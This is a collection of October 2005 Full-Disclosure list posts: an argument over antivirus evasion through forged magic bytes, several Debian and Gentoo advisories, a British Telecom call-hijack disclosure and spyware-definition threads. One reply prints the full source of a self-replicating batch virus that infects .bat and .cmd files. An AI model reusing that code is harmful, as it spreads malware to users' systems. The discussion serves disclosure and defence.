[Full-disclosure] Re: Multiple Vendor Anti-Virus Software Detection Evasion Vulnerability through forged magic byte
Andrey Bayora said: + If your altered virus sample + still executes correctly, you have simply created a new + virus variant. + + Not exactly, please look at this virustotal.com log + http://www.securityelf.org/updmagic.html + + The altered (120 bytes prepended) TXT_* variant is STILL + detected by your product (CA), but when I change the first + byte from Z to M - your product fails (MZ_* variant). + I believe, that if I PREPEND 120 bytes to known virus and + the virus is still detected with the SAME signature - + then I DID NOT create a new variant. Now one more example: + try to change the first byte Z in the TXT_* variant to + any value, but not to M - this virus will be detected, + but when you change to M, thus creating the .EXE magic + byte - the variant is not detected !!! My conclusion: + the antivirus thought that the file is the executable + type instead of determining the file type by the + extension. + + That is my point, if you still think that your product is + OK - do not do anything. Thierry Zoller said: + WJK You are effectively altering existing viruses to the + WJK point that AV scanners do not detect them. + + No, he is changing a few bytes only. + + WJK If your altered virus sample still executes + WJK correctly, you have simply created a new virus + WJK variant. + + No, there is no variant, the virus executes EXACTLY as + before. A variant acts differenlty then a precedent + version, else it would be no variant. To your AV engine it + is a variant, yes, but only because it is flawed. Why are you guys having such a difficult time comprehending this? Read both the general and AV-specific definitions of the word variant. http://dictionary.reference.com/search?q=variant http://www.symantec.com/avcenter/glossary/index.html#v http://us.mcafee.com/VirusInfo/VIL/glossary_app.asp#v If you take an existing virus and modify it, you have created a variant. The AV vendors aren't going to patch their products if they don't detect your PoC; they're just going to write a new signature or modify an existing signature to detect your new variants. The fact that it can and will be fixed by AV signatures instead of product patches should help you figure out if this is a product vulnerability issue or just a new virus variant issue. BTW, Andrey, did you bother to use the deep scan, heuristic mode, reviewer mode, etc to see if any of those AV scanners picked up your new variants? I bet you didn't. Thierry Zoller said: + WJK Consequently, the issue that you describe is *not* a + WJK vulnerability issue, but rather just an example of a + WJK new variant that has not yet been added to an AV + WJK vendor's database of known viruses. + + Thank you James, this _to my knowledge_ (perhaps the guy + from vmyths knows better) is the first time the complete + failure of todays AV solutions is shown naked publicaly + directly by a representant of an AV company. This + statement coming from a AV vendor is simply exposing what + is known in the sec. community since many years. To say that an AV scanner is a complete failure because it fails to detect a variant you just created is inane. Each of the top 10 AV scanners detects well over 95% of all known viruses. The AV scanners aren't perfect, but they definitely make a BIG BIG difference wrt malware risk mitigation. ftp://agn-www.informatik.uni-hamburg.de/pub/texts/tests/pc-av/2003-04/0xecsum.txt Thierry Zoller said: + The solution was to make the engines a bit smarter, i.e + analyse the header to determine the type and then ONLY + apply the signatures/heuristics which apply to the type of + the file (i am not speaking about the extension of the + file here) thus speeding up the process. Changing the + header just makes the smart engines look...well... a bit + dumb in my regards. There are two types of people in the world: those who complain about problems, and those who find solutions to problems. Where's your superior AV scanner? -- x @ bos ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 877-1] New gnump3d packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 877-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze October 28th, 2005 http://www.debian.org/security/faq - -- Package: gnump3d Vulnerability : cross-site scripting, directory traversal Problem type : remote Debian-specific: no CVE ID : CVE-2005-3122 CVE-2005-3123 Steve Kemp discovered two vulnerabilities in gnump3d, a streaming server for MP3 and OGG files. The Common Vulnerabilities and Exposures Project identifies the following problems: CVE-2005-3122 The 404 error page does not strip malicious javascript content from the resulting page, which would be executed in the victims browser. CVE-2005-3123 By using specially crafting URLs it is possible to read arbitary files to which the user of the streaming server has access to. The old stable distribution (woody) does not contain a gnump3d package. For the stable distribution (sarge) these problems have been fixed in version 2.9.3-1sarge2. For the unstable distribution (sid) these problems have been fixed in version 2.9.6-1. We recommend that you upgrade your gnump3d package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/g/gnump3d/gnump3d_2.9.3-1sarge2.dsc Size/MD5 checksum: 575 16114607fe426691518743a80a15deda http://security.debian.org/pool/updates/main/g/gnump3d/gnump3d_2.9.3.orig.tar.gz Size/MD5 checksum: 616250 1a0d6a10f6ac2354e1f8c6000665f299 http://security.debian.org/pool/updates/main/g/gnump3d/gnump3d_2.9.3-1sarge2.diff.gz Size/MD5 checksum:14298 9fbb9305ab4282b7957be8203dd6fb35 Architecture independent components: http://security.debian.org/pool/updates/main/g/gnump3d/gnump3d_2.9.3-1sarge2_all.deb Size/MD5 checksum: 603662 a94ff8504be400030a5f5fdb08987da0 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (GNU/Linux) iD8DBQFDYfRjW5ql+IAeqTIRAiSQAJ9J3KU5U/TV0XK6xPLNXlY8E9nhXgCeIKQI KQjf5W+ekqi1NjEw71BXrLE= =Je47 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] British Telecom remote landline hijack - NCR (No Crocodile-clips Required)
Overview British Telecom (BT) operates an automated fault detection and reporting system that allows anyone to test any line. If the line is found to be faulty the caller is given an option to divert all incoming calls for that line to another number, including mobile phones. No authentication is required and the owner of the line will be oblivious to the fact that her calls are being hijacked. Impact -- An attacker who is either aware of a faulty line or in a position to cause a fault on a line (e.g. by cutting/shorting it) is able to hijack all incoming calls to that line without the owners knowledge or consent. Whilst BT will have a log of the number to which the calls have been diverted, in these days of mobile-phone vending machines, this information is useless. Workaround -- Switch to a telephone company that has a clue. BT may work around this problem by employing more staff rather than trying to save money by implementing buggy, tortuous, irritating, automated systems. Status -- BT Engineers were notified. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200510-22 ] SELinux PAM: Local password guessing attack
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200510-22 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: SELinux PAM: Local password guessing attack Date: October 28, 2005 Bugs: #109485 ID: 200510-22 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A vulnerability in the SELinux version of PAM allows a local attacker to brute-force system passwords. Background == PAM (Pluggable Authentication Modules) is an architecture allowing the separation of the development of privilege granting software from the development of secure and appropriate authentication schemes. SELinux is an operating system based on Linux which includes Mandatory Access Control. Affected packages = --- Package / Vulnerable / Unaffected --- 1 sys-libs/pam 0.78-r3= 0.78-r3 Description === The SELinux patches for PAM introduce a vulnerability allowing a password to be checked with the unix_chkpwd utility without delay or logging. This vulnerability doesn't affect users who do not run SELinux. Impact == A local attacker could exploit this vulnerability to brute-force passwords and escalate privileges on an SELinux system. Workaround == There is no known workaround at this time. Resolution == All SELinux PAM users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =sys-libs/pam-0.78-r3 References == [ 1 ] CVE-2005-2977 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2977 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200510-22.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2005 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.0 signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200510-23 ] TikiWiki: XSS vulnerability
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200510-23 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Low Title: TikiWiki: XSS vulnerability Date: October 28, 2005 Bugs: #109858 ID: 200510-23 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis TikiWiki is vulnerable to cross-site scripting attacks. Background == TikiWiki is a web-based groupware and content management system (CMS), using PHP, ADOdb and Smarty. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 www-apps/tikiwiki 1.9.1.1 = 1.9.1.1 Description === Due to improper input validation, TikiWiki can be exploited to perform cross-site scripting attacks. Impact == A remote attacker could exploit this to inject and execute malicious script code or to steal cookie-based authentication credentials, potentially compromising the victim's browser. Workaround == There is no known workaround at this time. Resolution == All TikiWiki users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =www-apps/tikiwiki-1.9.1.1 Note: Users with the vhosts USE flag set should manually use webapp-config to finalize the update. Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200510-23.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2005 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.0 signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200510-24 ] Mantis: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200510-24 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Mantis: Multiple vulnerabilities Date: October 28, 2005 Bugs: #110326 ID: 200510-24 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Mantis is affected by multiple vulnerabilities ranging from information disclosure to arbitrary script execution. Background == Mantis is a web-based bugtracking system written in PHP. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 www-apps/mantisbt 0.19.3 = 0.19.3 Description === Mantis contains several vulnerabilities, including: * a remote file inclusion vulnerability * an SQL injection vulnerability * multiple cross site scripting vulnerabilities * multiple information disclosure vulnerabilities Impact == An attacker could exploit the remote file inclusion vulnerability to execute arbitrary script code, and the SQL injection vulnerability to access or modify sensitive information from the Mantis database. Furthermore the cross-site scripting issues give an attacker the ability to inject and execute malicious script code or to steal cookie-based authentication credentials, potentially compromising the victim's browser. An attacker could exploit other vulnerabilities to disclose information. Workaround == There is no known workaround at this time. Resolution == All Mantis users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =www-apps/mantisbt-0.19.3 References == [ 1 ] Mantis ChangeLog http://www.mantisbt.org/changelog.php Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200510-24.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2005 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.0 signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 878-1] New netpbm-free packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 878-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze October 28th, 2005 http://www.debian.org/security/faq - -- Package: netpbm-free Vulnerability : buffer overflow Problem type : local (remote) Debian-specific: no CVE ID : CVE-2005-2978 A buffer overflow has been identified in the pnmtopng component of the netpbm package, a set of graphics conversion tools. This vulnerability could allow an attacker to execute arbitrary code as a local user by providing a specially crafted PNM file. The old stable distribution (woody) it not vulnerable to this problem. For the stable distribution (sarge) this problem has been fixed in version 10.0-8sarge1. For the unstable distribution (sid) this problem has been fixed in version 10.0-10. We recommend that you upgrade your netpbm-free packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/n/netpbm-free/netpbm-free_10.0-8sarge1.dsc Size/MD5 checksum: 749 826066a252124fc16f23cd484665a46f http://security.debian.org/pool/updates/main/n/netpbm-free/netpbm-free_10.0-8sarge1.diff.gz Size/MD5 checksum:44864 f797c3b500fc5255c3624973bce9b1c1 http://security.debian.org/pool/updates/main/n/netpbm-free/netpbm-free_10.0.orig.tar.gz Size/MD5 checksum: 1926538 985e9f6d531ac0b2004f5cbebdeea87d Alpha architecture: http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm10_10.0-8sarge1_alpha.deb Size/MD5 checksum:82612 e3808e3b400840d9a9cb6397f85bfe8e http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm10-dev_10.0-8sarge1_alpha.deb Size/MD5 checksum: 145896 57d3e7b0d77e72c94812affa8f55d5fe http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm9_10.0-8sarge1_alpha.deb Size/MD5 checksum:91526 a14de5dcfb2aa0698b25be38a656f036 http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm9-dev_10.0-8sarge1_alpha.deb Size/MD5 checksum: 146312 cd518afd280793edf6de1642fe0bf131 http://security.debian.org/pool/updates/main/n/netpbm-free/netpbm_10.0-8sarge1_alpha.deb Size/MD5 checksum: 1594754 8358e104e61d84614726d16db7d7dd44 AMD64 architecture: http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm10_10.0-8sarge1_amd64.deb Size/MD5 checksum:68698 3f7cea0750ef84bc28b71e549d2a236b http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm10-dev_10.0-8sarge1_amd64.deb Size/MD5 checksum: 117940 e555e5219445a1513e08b9dd74f33be8 http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm9_10.0-8sarge1_amd64.deb Size/MD5 checksum:77070 4072597c94858e3dc55d402a6a892e2b http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm9-dev_10.0-8sarge1_amd64.deb Size/MD5 checksum: 118338 c9ed97f95be1f82f15ab7ea55f660c7d http://security.debian.org/pool/updates/main/n/netpbm-free/netpbm_10.0-8sarge1_amd64.deb Size/MD5 checksum: 1277348 76f9a183926dc8147c8a3e534b13cff5 ARM architecture: http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm10_10.0-8sarge1_arm.deb Size/MD5 checksum:61762 f09e9f6e310df8460df5c24956410557 http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm10-dev_10.0-8sarge1_arm.deb Size/MD5 checksum: 114576 988371fd7acc8124d58220c0e41f715c http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm9_10.0-8sarge1_arm.deb Size/MD5 checksum:68828 f0ccd0d9dbc5167ca98bafdae9d0e281 http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm9-dev_10.0-8sarge1_arm.deb Size/MD5 checksum: 115000 9afda9b7e72927c8777b12d89e9cd5e2 http://security.debian.org/pool/updates/main/n/netpbm-free/netpbm_10.0-8sarge1_arm.deb Size/MD5 checksum: 1226590 6deb64cdaf7dca0b6806051cc2413d85 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm10_10.0-8sarge1_i386.deb Size/MD5 checksum:64900 e67ed2af944bf6bf1f47c6273882e1e4
[Full-disclosure] Re: Microsoft AntiSpyware falling further behind
Hi, Maybe better to call the things their names and not to create havoc? Let's there be adware, Trojan horses, backdoors, viruses, etc. Hullabaloo with so called spyware has brought us up to such a state, that on September 29th PC World wrote While adware can be a major annoyance, spyware can be very dangerous, so we focused on the latter type of threat. (http://www.pcworld.com/reviews/article/0,aid,122496,pg,1,00.asp). Who can tell where exactly spyware begins and where ends? Maybe antivirus products should detect all dangerous and potentially dangerous programs, leaving the choice which objects to exclude from scanning to users? Anti-spyware by definition are products which protect users against something undefined. And the results are to be seen. This is the report from infected computer, scanned Kaspersky Anti-Virus: Trojan.Win32.Qhost.dg Backdoor.Win32.Rbot.gen Net-Worm.Win32.Mytob.an Net-Worm.Win32.Mytob.gen Backdoor.Win32.Wootbot.gen Trojan-Downloader.BAT.Ftp.ab Backdoor.Win32.Codbot.as AdWare.Sahat.ao AdWare.Cydoor.a AdWare.WinAD.aw Only actively dangerous programs are listed. The computer was protected by Spybot - Search Destroy and Microsoft AntiSpyware. As I summarize reports on infected computers every month, there are many such an examples saved up. Best regards, Valdis - Original Message - From: Quark IT - Hilton Travis [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Friday, October 21, 2005 11:50 PM Subject: Microsoft AntiSpyware falling further behind Hi All, It seems that not only does Microsoft AntiSpyware recommend that Claria's spyware is ignored, but it also misses a significant amount of cookies that are placed on a system - I have a VPC environment where I browse the Internet so that anywhere I go won't affect my regular Windows session/installation. Regularly CounterSpy is detecting cookies (such as Cok.ad.yieldmanager, CGI-Bin, Cok.AssassinTrojan2.0 and Zedo (from yesterday's browsing)) that Microsoft AntiSpyware simply does not know about. Now, this is not only disappointing, but potentially dangerous. Any customer or end user running Microsoft AntiSpyware or CounterSpy is not being protected from these cookies, and MSAS doesn't even detect them - that's right, neither program's active monitoring is stopping the installation of these cookies, but at least CounterSpy is detecting them post-installation. AntiSpyware is far, far from the accuracy of antivirus, especially something like NOD32. I wonder how long it will be before a decent AntiSpyware application is released that, like NOD32 does with viruses, actually stops spyware *before* it is installed? -- Regards, Hilton Travis Phone: +61 (0)7 3344 3889 (Brisbane, Australia) Phone: +61 (0)419 792 394 Manager, Quark IT http://www.quarkit.com.au Quark Group http://quarkgroup.com.au/ Microsoft Small Business Specialists http://www.threatcode.com/ -- its now time to shame poor coders into writing code that is acceptable for use on today's networks War doesn't determine who is right. War determines who is left. This document and any attachments are for the intended recipient only. It may contain confidential, privileged or copyright material which must not be disclosed or distributed. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] RE: Full-Disclosure Digest, Vol 8, Issue 48
The virus scanner determined the type of the file by the header and it failed. That's bad news. I am wondering however, when I execute that file, how does the OS process the file? I guess my question is, if I have a modified version of a virus, with whatever header, if I try to execute that file, will the virus code get executed? Lets see, do you think this would be executed? --- MZ%Nihilist% [EMAIL PROTECTED] off %Nihilist%set num=0 :ag %Nihilist% %Nihilist%set fn%num%= %Nihilist%set /a num+=1 %Nihilist%if %num% LSS 5 goto ag %Nihilist%set num=0 %Nihilist%for %%a in (*.bat *.cmd) do call :mr %%a %Nihilist%set num=-1 :fi %Nihilist% %Nihilist%set /a num+=1 %Nihilist%if %num% GTR 5 (goto ROF) %Nihilist%if %num% EQU 0 (set file=%fn0%) %Nihilist%if %num% EQU 1 (set file=%fn1%) %Nihilist%if %num% EQU 2 (set file=%fn2%) %Nihilist%if %num% EQU 3 (set file=%fn3%) %Nihilist%if %num% EQU 4 (set file=%fn4%) %Nihilist%if %num% EQU 5 (set file=%fn5%) %Nihilist%set rnd=%random% %Nihilist%set spth=%0 :findnum%Nihilist% %Nihilist%set /a rnd-=10 %Nihilist%if %rnd% GEQ 10 (goto findnum) %Nihilist%set lz=0 %Nihilist%del tmp %Nihilist%for /f tokens=1* %%a in (%file%) do if 1 EQU 1 ( %Nihilist% set lc=%%a %%b %Nihilist% call :wl %Nihilist%) find Nihilist %spth% tmp %Nihilist%more +%rnd% %file% tmp %Nihilist%move /y tmp %file% [EMAIL PROTECTED] on %Nihilist%goto fi :wl %Nihilist% %Nihilist%set /a lz=%lz%+1 %Nihilist%if %lz% LEQ %rnd% (echo %lc% tmp) %Nihilist%goto :EOF :mr %Nihilist% %Nihilist%if %num% LEQ 5 ( %Nihilist%set fn%num%=%1 %Nihilist%set /a num+=1 %Nihilist%) :ROF%Nihilist% --- Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: Multiple Vendor Anti-Virus Software DetectionEvasion Vulnerability through forged magic byte
Hello x, The AV vendors aren't going to patch their products if they don't detect your PoC; they're just going to write a new signature or modify an existing signature to detect your new variants. The fact that it can and will be fixed by AV signatures instead of product patches should help you figure out if this is a product vulnerability issue or just a new virus variant issue. Good point, so I have news for you - some AV vendors contacted me and they are WILL issue patches for their products. Is it what you need as a proof of existence of a bug? Please, wait couple of weeks. BTW, Andrey, did you bother to use the deep scan, heuristic mode, reviewer mode, etc to see if any of those AV scanners picked up your new variants? YES, that is the reason why I prefer to use my AV lab instead of virustotal.com and others. The only exception is CA - I tested 7.0 version that didn't has reviewer mode (or I didn't found how to enable this). I bet you didn't. Why are you guessing (betting)? I provide all information that you need to check this bug and not to make up a conclusions based on guesses. Best regards, Andrey Bayora. - Original Message - From: x [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Friday, October 28, 2005 8:05 AM Subject: [Full-disclosure] Re: Multiple Vendor Anti-Virus Software DetectionEvasion Vulnerability through forged magic byte Andrey Bayora said: + If your altered virus sample + still executes correctly, you have simply created a new + virus variant. + + Not exactly, please look at this virustotal.com log + http://www.securityelf.org/updmagic.html + + The altered (120 bytes prepended) TXT_* variant is STILL + detected by your product (CA), but when I change the first + byte from Z to M - your product fails (MZ_* variant). + I believe, that if I PREPEND 120 bytes to known virus and + the virus is still detected with the SAME signature - + then I DID NOT create a new variant. Now one more example: + try to change the first byte Z in the TXT_* variant to + any value, but not to M - this virus will be detected, + but when you change to M, thus creating the .EXE magic + byte - the variant is not detected !!! My conclusion: + the antivirus thought that the file is the executable + type instead of determining the file type by the + extension. + + That is my point, if you still think that your product is + OK - do not do anything. Thierry Zoller said: + WJK You are effectively altering existing viruses to the + WJK point that AV scanners do not detect them. + + No, he is changing a few bytes only. + + WJK If your altered virus sample still executes + WJK correctly, you have simply created a new virus + WJK variant. + + No, there is no variant, the virus executes EXACTLY as + before. A variant acts differenlty then a precedent + version, else it would be no variant. To your AV engine it + is a variant, yes, but only because it is flawed. Why are you guys having such a difficult time comprehending this? Read both the general and AV-specific definitions of the word variant. http://dictionary.reference.com/search?q=variant http://www.symantec.com/avcenter/glossary/index.html#v http://us.mcafee.com/VirusInfo/VIL/glossary_app.asp#v If you take an existing virus and modify it, you have created a variant. The AV vendors aren't going to patch their products if they don't detect your PoC; they're just going to write a new signature or modify an existing signature to detect your new variants. The fact that it can and will be fixed by AV signatures instead of product patches should help you figure out if this is a product vulnerability issue or just a new virus variant issue. BTW, Andrey, did you bother to use the deep scan, heuristic mode, reviewer mode, etc to see if any of those AV scanners picked up your new variants? I bet you didn't. Thierry Zoller said: + WJK Consequently, the issue that you describe is *not* a + WJK vulnerability issue, but rather just an example of a + WJK new variant that has not yet been added to an AV + WJK vendor's database of known viruses. + + Thank you James, this _to my knowledge_ (perhaps the guy + from vmyths knows better) is the first time the complete + failure of todays AV solutions is shown naked publicaly + directly by a representant of an AV company. This + statement coming from a AV vendor is simply exposing what + is known in the sec. community since many years. To say that an AV scanner is a complete failure because it fails to detect a variant you just created is inane. Each of the top 10 AV scanners detects well over 95% of all known viruses. The AV scanners aren't perfect, but they definitely make a BIG BIG difference wrt malware risk mitigation. ftp://agn-www.informatik.uni-hamburg.de/pub/texts/tests/pc-av/2003-04/0xecsum.txt Thierry Zoller said: + The solution was to make the engines a bit smarter, i.e + analyse the
Re: [Full-disclosure] Re: Microsoft AntiSpyware falling further behind
Hi, As today I was preparing news for a portal on IT security, I am informed that Anti-Spyware Coalition is finalizing spyware definition. It is last moment to finalize with spyware, because at the horizon already has appeared “crimeware”. Take a look at http://www.antiphishing.org/. I’m quoting: „Technical subterfuge schemes plant crimeware onto PCs to steal credentials directly, often using Trojan keylogger spyware.” Maybe it would be better to call Trojan horses Trojan horses? Regards, Valdis - Original Message - From: Jerome Athias [EMAIL PROTECTED] To: Valdis Shkesters [EMAIL PROTECTED] Sent: Friday, October 28, 2005 4:22 PM Subject: Re: [Full-disclosure] Re: Microsoft AntiSpyware falling further behind Valdis Shkesters wrote: Hi, Maybe better to call the things their names and not to create havoc? sure. Maybe will be interesting for you: http://www.theregister.co.uk/2005/10/28/anti-spyware_defs/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Brain dead SSH scans from Italy
Well, I'm stumped. I mean, really stumped. I've had a host scanning my network for the past three days, and it initially looked like one of the automated scans we've all become so familiar with (unfortunately). Naturally, the automatic defense was engaged, and I thought that would be the end of it. Nope. It continues to send SYN packets, and although it's dropped off in attacks to the other machines, it still pounds at the doors of two of them. Those two machines have a couple of things in common: they are both running BIND 9, and are both OpenBSD {mumble}. I've sent email off to the RIPE contacts for the IP (195.250.227.226), and to the WHOIS contacts for the domain (ocem.com), and to [EMAIL PROTECTED] as well. Nothing. If I take off the null routing on either of those machines, it immediately starts hammering at them, with no signs of cessation. I have considered just letting it finish, but I'm more concerned that there's a new variant on this moronic scan that doesn't know when to quit. I suspect that the continuation is because they are DNS servers, since I took the blocking off of one of the other machines also running OpenBSD, and the scanning did not resume (although I had expected it to). I'm at a loss. If anyone knows Italian (I don't), and can contact one of: [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] or anyone at ocem.com, please, let them know that the machine is compromised, and that they need to take it off line, and clean it up. TIA and all that. -- There are two ways, my friend, that you can be rich in life. One is to make a lot of money and the other is to have few needs. William Sloane Coffin, Letters to a Young Doubter ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: Microsoft AntiSpyware falling further behind
On Fri, 28 Oct 2005 17:56:32 +0300, Valdis Shkesters said: (Hmm.. usually when I reply to Valdis I'm talking to myself... ;) As today I was preparing news for a portal on IT security, I am informed that Anti-Spyware Coalition is finalizing spyware definition. It is last moment to finalize with spyware, because at the horizon already has appeared crimeware. Take a look at http://www.antiphishing.org/. Im quoting: Technical subterfuge schemes plant crimeware onto PCs to steal credentials directly, often using Trojan keylogger spyware. Maybe it would be better to call Trojan horses Trojan horses? No, because they're different. Trojan horses (a) get installed under pretense of being something wanted or beneficial (Hey, I'm a neat fun codec that lets you view these movies...) and (b) once there, gives the attacker a back door into the system, to do unspecified things (run commands, launch DDoS attacks, send spam, scan for other vulnerable software, upload plugins to extend the Trojan's functionality, or whatever). Spyware, on the other hand (a) *may* be installed via Trojan Horse means, but may also be forcibly inserted on a system via a software vulnerability, or added in via the above-mentioned plugin method by an already-present Trojan, and (b) is software that monitors system activity (keystrokes, screen pixmaps, etc) in an effort to acquire credentials or other sensitive information. pgpk2GcKOXkFv.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Brain dead SSH scans from Italy
On Fri, 2005-10-28 at 08:15 -0700, Etaoin Shrdlu wrote: Well, I'm stumped. I mean, really stumped. I've had a host scanning my network for the past three days, and it initially looked like one of the automated scans we've all become so familiar with (unfortunately). Naturally, the automatic defense was engaged, and I thought that would be the end of it. Nope. [..snipped..] I'm at a loss. If anyone knows Italian (I don't), and can contact one of: [..snipped..] Try this site: http://babelfish.altavista.com/babelfish/ which can translate English to Italian. You might want to cc the abuse address for their upstream too. Regards, J -- Jeff MacDonald Zoid Technologies GPG Fingerprint: 0831 879E B6B4 C4CC D3C9 419F B12D E3CE B927 04B2 signature.asc Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: Multiple Vendor Anti-Virus Software DetectionEvasion Vulnerability through forged magic byte
